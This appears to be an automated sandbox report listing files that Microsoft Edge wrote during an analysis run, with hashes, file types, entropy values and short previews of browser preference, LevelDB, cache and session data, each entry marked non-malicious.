                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378826830031057","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):25012
                                                                                                                                                                                                                                                                Entropy (8bit):5.567227888340905
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:llvMcqWPwufTS8F1+UoAYDCx9Tuqh0VfUC9xbog/OVWDULIrwgpXtun:llvMcqWPwufTSu1jaP4LZgtE
                                                                                                                                                                                                                                                                MD5:9ED3060A9F39B28EF4CB707645732673
                                                                                                                                                                                                                                                                SHA1:48B40BE9DCB688E3BB3E8BA0945C9268A8231672
                                                                                                                                                                                                                                                                SHA-256:78237730668568C717C167CD7A6ED23E050EBDC52C5A3304CE7FBF6C529D39A6
                                                                                                                                                                                                                                                                SHA-512:B193E592E0F6800008F6545C44CC15A59DAE5818FCD4C7B260B92DB3BA69A924B7CA081D86EFF88BB87E2CD22E228CDA5090B04C6241D1E0D7CEA0FAA4CD9F17
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378826829511448","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378826829511448","location":5,"ma
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):25012
                                                                                                                                                                                                                                                                Entropy (8bit):5.567227888340905
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:llvMcqWPwufTS8F1+UoAYDCx9Tuqh0VfUC9xbog/OVWDULIrwgpXtun:llvMcqWPwufTSu1jaP4LZgtE
                                                                                                                                                                                                                                                                MD5:9ED3060A9F39B28EF4CB707645732673
                                                                                                                                                                                                                                                                SHA1:48B40BE9DCB688E3BB3E8BA0945C9268A8231672
                                                                                                                                                                                                                                                                SHA-256:78237730668568C717C167CD7A6ED23E050EBDC52C5A3304CE7FBF6C529D39A6
                                                                                                                                                                                                                                                                SHA-512:B193E592E0F6800008F6545C44CC15A59DAE5818FCD4C7B260B92DB3BA69A924B7CA081D86EFF88BB87E2CD22E228CDA5090B04C6241D1E0D7CEA0FAA4CD9F17
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378826829511448","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378826829511448","location":5,"ma
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):80
                                                                                                                                                                                                                                                                Entropy (8bit):4.323098996850684
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:chltUQ2Hm4kxH4xRNwBgzNnNurkXn:chXUQI2xH8BzNmen
                                                                                                                                                                                                                                                                MD5:8DA62954B0B14642CF287A260418E39B
                                                                                                                                                                                                                                                                SHA1:E82BF98669AE1D73BBD9294D9F454044D5C2622E
                                                                                                                                                                                                                                                                SHA-256:B7E25784D1B3A3653C618822715DAE7CC86BF0B05FFF0CF3C5D6A1FB169F0614
                                                                                                                                                                                                                                                                SHA-512:E44DC92CAA0579A81CBF176A589493421AAD851D7006603B54684EE8CBFC67F572F2B0219F4483227F3FF9CC614D882B2ADB8060873E358C7D6870CAF9E3865C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):299
                                                                                                                                                                                                                                                                Entropy (8bit):5.158500114350316
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7AAV1CHhJ23oH+TcwtE/a252KLlpAAU3+q2PCHhJ23oH+TcwtE/a2ZIFUv:7BYeb8xLTE3+vBYeb8J2FUv
                                                                                                                                                                                                                                                                MD5:E768D6A7A7F2BA9616339B6EC4CF3F41
                                                                                                                                                                                                                                                                SHA1:ED3574891D309CC47AE6AB03C89729B42086EEF7
                                                                                                                                                                                                                                                                SHA-256:84271E16E4914F88BEC09A03AA80E1408A8F468EE7D1EAC9BA1E3DCCD8CA47E2
                                                                                                                                                                                                                                                                SHA-512:FBFC2E0AA13AE631C5625E0C47073223F5C96730F52110F137890DBB5AEF4302FBEF48891568A58EBA479004342F5CB61CFD3C128C8588B0CC64779591C61C90
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:27.646 144c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/16-07:47:27.661 144c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):114694
                                                                                                                                                                                                                                                                Entropy (8bit):5.577958299607159
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:sU906yxPXfOxr1lhCe1nL/rmL/rBZXECjPXNtSsNFS7LREqpC:B9LyxPXfOxr1lMe1nL/CL/TXE6t07t4
                                                                                                                                                                                                                                                                MD5:420CD86FBAEC219735C9B219F22BF1A9
                                                                                                                                                                                                                                                                SHA1:FA11B7D24036E171CABBBF168A3AA7A4534E708A
                                                                                                                                                                                                                                                                SHA-256:9314D9508EB767E4B8BB57F68AA5DB67BA22D4D7B20DEF1BF17FD2A57FD087A2
                                                                                                                                                                                                                                                                SHA-512:6D8477CE69DB8B7BBFA44498BF28F14A3BB55059331C02BFEB7315A21D5414FBF9238DCB926B9A0E2A47EC4B9C461CF654E68D23E851F90C003FD444B7A2FD7E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):189185
                                                                                                                                                                                                                                                                Entropy (8bit):6.386372830799687
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:HvFL0y8VmwbrVMHRwL/ZKdOfekWQ66mi1clvW:amwNMHuL/AIhWfre
                                                                                                                                                                                                                                                                MD5:5CC5965437CAE4A1D417B920C7F77D3C
                                                                                                                                                                                                                                                                SHA1:8E3ADFE87679BB6FFAEF4A8C3954327921D4C907
                                                                                                                                                                                                                                                                SHA-256:BAA925553532356E2DA8D9AA382BBFD23A341DE866E6F376FC217167CAAA330F
                                                                                                                                                                                                                                                                SHA-512:79E27A50CF6EBD80A94A0DCE72A6BA320D30F3B8794584C9F1444C0261793B446506F02BB26AB9639389F2A62089F543DC347CFDEB945647E5EFDF94F4DDA769
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:0\r..m..........rSG.....0....z3.................;.....x..........,T.8..`,.....L`.....,T...`......L`......Rc.)......exports...Rc>..;....module....RcVD......define....Rb.\......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m.....b...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....[...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):24
                                                                                                                                                                                                                                                                Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:0\r..m..................
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:dl0HFQyXl/lYV/lxE0tllQQXgKl:0SKYW0+QXgKl
                                                                                                                                                                                                                                                                MD5:34A65476E6B26557E7B33DAF5E386A3C
                                                                                                                                                                                                                                                                SHA1:D9536B970B5A00CCFE1B86D8AF8DF801D14CA316
                                                                                                                                                                                                                                                                SHA-256:ED3E759165299AC7846D82AB0CAE08F431ECB13E61FA73A1F4D1D81FC94E775D
                                                                                                                                                                                                                                                                SHA-512:DDD14B6BACD58DCA4E5EA87184200CE519B1EC099834220118C86FE1C47872D50CFEA8993DA1319760F337E3A0B9CD8588A75FCFADDC534ACCD7BDE00FB74681
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:@...h. koy retne.........................X....,.................|..../.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6599
                                                                                                                                                                                                                                                                Entropy (8bit):3.38062221292264
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:eYsi/Cbp6r4SaavjfMfXRP7h9Xp+qDiW5SLl9iSreX2XDB:eW/Cbp6Wdh9Xp+oT5SLl9iSru29
                                                                                                                                                                                                                                                                MD5:B9FB218D256C08731298D744B17F3527
                                                                                                                                                                                                                                                                SHA1:E483ABC26F8A34C5A7C2DABB84992BDA1B2A9F8F
                                                                                                                                                                                                                                                                SHA-256:8FA7657D462934D16A964FBDE63AEBB8DBA7CC546CF6EC43A0B68C0F73EAD492
                                                                                                                                                                                                                                                                SHA-512:29BDC1707D3C842735C768DEE0CBE960E38FFBFDFCFC6EA11D88FFA9E1F404BD8F1316D701338941F9528ACA7F2A542CEFAD41DADCE86AD55556B229EBE346BB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................zb................next-map-id.1.Cnamespace-0f8575b3_2ee1_46ea_a935_3b3d51ceb898-https://ntp.msn.com/.0V.e................V.e................V.e................V.e................@\9S.................map-0-shd_sweeper.0{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.e.h.p.s.b.h.v.c.,.a.d.s.-.m.n.-.m.i.g.r.,.p.r.g.-.p.o.l.i.s.h.e.d.-.s.t.y.l.e.s.,.p.r.g.-.1.s.-.d.w.v.i.d.-.t.1.,.1.s.-.p.1.-.d.w.l.s.,.1.s.-.p.2.-.d.w.l.s.,.p.r.g.-.1.s.w.-.n.o.c.o.o.l.d.o.w.n.,.p.r.g.-.p.r.1.-.v.i.d.e.o.s.,.p.r.g.-.p.r.2.-.v.i.d.e.o.s.,.p.r.g.-.v.i.d.-.d.w.l.s.c.a.c.h.e.,.p.r.g.-.1.s.w.-.s.a.-.s.p.6.-.t.1.f.,.p.r.g.-.1.s.w.-.s.a.l.3.f.c.t.b.1.,.p.r.g.-.1.s.w.-.c.-.c.h.a.n.g.e.s.i.z.e.,.p.r.g.-.1.s.w.-.n.o.r.e.t.r.y.,.p.r.g.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):321
                                                                                                                                                                                                                                                                Entropy (8bit):5.176885219863171
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7A1dzlyq2PCHhJ23oH+TcwtrQMxIFUt8OA1Ca1Zmw+OA1o1RkwOCHhJ23oH+TcwJ:7Y1lyvBYebCFUt8OYF/+OYSR56YebtJ
                                                                                                                                                                                                                                                                MD5:D395BFFB63775A77572162E7DE783E9E
                                                                                                                                                                                                                                                                SHA1:3CE544B0F52A4101686E89FE277F9FB27DDC4240
                                                                                                                                                                                                                                                                SHA-256:545B98A87AA3197D63533CCEDCC010A0D78BFB61285663049D11EFC37FE1F753
                                                                                                                                                                                                                                                                SHA-512:B6156196EEA237A95A9AD46799B7E2D65BDAF65A4239A4CB4C2BC1A7D11DC47D5E1F8E6ABE87766CA2C53763E1CEB01994D899FB105D80794A8419B19A090ECD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:10.389 fe0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/16-07:47:10.390 fe0 Recovering log #3.2024/12/16-07:47:10.393 fe0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1443
                                                                                                                                                                                                                                                                Entropy (8bit):3.8190063404350902
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:3Z8s8WpocqBdLpsAF4unxdmH9tLp3X2amEtG1Chqrbi9rAJcZGgQKkOAM4Qz:3msqcSdLzFtwXLp2FEkChQbIASZGxHOp
                                                                                                                                                                                                                                                                MD5:9E44A9D3B9A250D3CF46659C19DCE857
                                                                                                                                                                                                                                                                SHA1:F7893397964CA19641397CE60B45A8121CC3A984
                                                                                                                                                                                                                                                                SHA-256:A091546414E1BCFE175CADF15F54BA67EFC0D1ABCB7F096248A41079ADC26CF6
                                                                                                                                                                                                                                                                SHA-512:D0319C9489797A5BDA785045209C10FB472A7693DD92D0D98EDFF312960533C6B9E96B7F0531511039819609B33AF30B38A5DAA77FEF1245B4A5B471B4C52219
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SNSS.........V9.............V9......"..V9.............V9.........V9.........V9.........V9....!....V9.................................V9..V91..,.....V9$...0f8575b3_2ee1_46ea_a935_3b3d51ceb898.....V9.........V9....8=...........V9.....V9.........................V9....................5..0.....V9&...{890D5FC3-0C4C-4214-A93A-B8E730A022A1}.......V9.........V9............................V9.............V9........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x........c.b)...c.b).................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):349
                                                                                                                                                                                                                                                                Entropy (8bit):5.197131648665825
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7Agt+q2PCHhJ23oH+Tcwt7Uh2ghZIFUt8OAHJZmw+OAH9VkwOCHhJ23oH+Tcwt7w:70vBYebIhHh2FUt8OQ/+OY56YebIhHLJ
                                                                                                                                                                                                                                                                MD5:80344E87132500F555D5EC7D124FE7AE
                                                                                                                                                                                                                                                                SHA1:7049B8FBBA358B483D002715014D8149489520CA
                                                                                                                                                                                                                                                                SHA-256:ED485CD391E80CC706D512B8522AF6F984E1B9869C334117DD5D8B3B621E91F0
                                                                                                                                                                                                                                                                SHA-512:A846257595205D8B1A0B563CBEDC729E2F0256A2DBFFDCB0EDF35625F12EB04AB0F8B9E26C91E0AAD1256EE112F149B9F8CF87E86DE9F1EC657F31B09CC74508
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:09.492 b18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/16-07:47:09.493 b18 Recovering log #3.2024/12/16-07:47:09.493 b18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):431
                                                                                                                                                                                                                                                                Entropy (8bit):5.251824253194198
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:7YVQ+vBYebvqBQFUt8OYMdW/+ObQV56YebvqBvJ:7YV5BYebvZg8OYMwbS6Yebvk
                                                                                                                                                                                                                                                                MD5:EB336B12549305DB7C66F8A37630BEFC
                                                                                                                                                                                                                                                                SHA1:332572E1BAB4731A949E86BFB6075A0DB69C3EF0
                                                                                                                                                                                                                                                                SHA-256:8BD0E7EEE7D87768EF928796492C5E09C4A79C0A5B32D664BF1D58C398EC39B2
                                                                                                                                                                                                                                                                SHA-512:03873B7817F477A080DB845137769795B5E72E5AF37FE9E87B111056DA892563870C6E8B801055F0690B314BECD473B84E323AFF04B0707727BA5D05BA19847C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:10.397 33c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/16-07:47:10.398 33c Recovering log #3.2024/12/16-07:47:10.402 33c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):431
                                                                                                                                                                                                                                                                Entropy (8bit):5.251824253194198
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:7YVQ+vBYebvqBQFUt8OYMdW/+ObQV56YebvqBvJ:7YV5BYebvZg8OYMwbS6Yebvk
                                                                                                                                                                                                                                                                MD5:EB336B12549305DB7C66F8A37630BEFC
                                                                                                                                                                                                                                                                SHA1:332572E1BAB4731A949E86BFB6075A0DB69C3EF0
                                                                                                                                                                                                                                                                SHA-256:8BD0E7EEE7D87768EF928796492C5E09C4A79C0A5B32D664BF1D58C398EC39B2
                                                                                                                                                                                                                                                                SHA-512:03873B7817F477A080DB845137769795B5E72E5AF37FE9E87B111056DA892563870C6E8B801055F0690B314BECD473B84E323AFF04B0707727BA5D05BA19847C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:10.397 33c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/16-07:47:10.398 33c Recovering log #3.2024/12/16-07:47:10.402 33c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
